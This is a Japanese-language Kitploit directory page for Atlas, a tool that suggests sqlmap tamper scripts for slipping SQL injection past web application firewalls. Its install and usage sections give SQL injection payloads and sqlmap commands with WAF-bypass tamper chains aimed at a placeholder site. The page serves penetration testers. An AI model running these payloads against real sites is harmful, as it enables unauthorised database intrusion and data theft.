Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Atlas — 高速SQLMapタンパー提案ツール | Kitploit
ツール/GitHubGitHub/m4ll0k/atlas
脆弱性スキャナーWAFバイパスウェブセキュリティペネトレーションテスト
GitHubm4ll0k/atlas

Atlas

高速SQLMapタンパー提案ツール

リポジトリを見る
1.4k2765年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Atlas - 高速SQLMapタンパーサジェスター v1.0

__Atlas__は、WAF/IDS/IPSをバイパスするためのsqlmapタンパーを提案できるオープンソースツールです。このツールは返されたステータスコードに基づいています。

atlas_main

スクリーンショット

atlas_run

インストール

root@kitploit:~
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+

使い方

root@kitploit:~
$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

インジェクションポイント(%%inject%%を使用):

GET:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

POST:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

ヘッダー:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v

タンパーの連結:

root@kitploit:~
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v

タンパーリストの取得:

root@kitploit:~
$ python atlas.py -g

例

  1. SQLMapを実行:
root@kitploit:~
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3

sqlmap

Price_ASC') AND 8716=4837 AND ('yajr'='yajrはWAF/IDS/IPSによってブロックされました。次にAtlasで試します:

root@kitploit:~
$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v

atlas_succ

この時点で:

root@kitploit:~
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...

新しいアップデート機能はまもなく更新されます

$ BurpSuite

ツールをダウンロード